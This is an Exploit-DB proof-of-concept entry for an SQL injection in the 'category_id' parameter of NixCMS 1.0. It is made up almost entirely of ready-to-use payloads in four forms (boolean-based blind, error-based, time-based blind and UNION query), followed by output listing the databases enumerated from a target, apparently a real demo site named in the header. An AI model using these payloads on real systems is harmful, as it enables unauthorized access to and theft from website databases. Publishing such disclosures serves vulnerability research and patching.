EDB-ID: 43966 | Author: Bora Bozdogan | Published: 2018-02-05 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App: N/A | # Exploit Title: NixCMS 1.0 - 'category_id' SQL Ýnjection
# Dork: N/A
# Date: 03.02.2018
# Vendor: https://www.nixdesign.de
# Software Link: https://www.nixdesign.de/nix-cms/
# Demo: http://www.jamaram.de/
# Version: 1.0
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : [email protected]
# Author Skype : borayazilim45
# #
# POC:
#
# http://localhost/[PATH]/single.php?category_id=[SQL]
#
# Parameter: category_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
#
# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 15 columns
# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF
#
# #
available databases [3]:
[*] information_schema
[*] usr_web24_1
[*] web24_4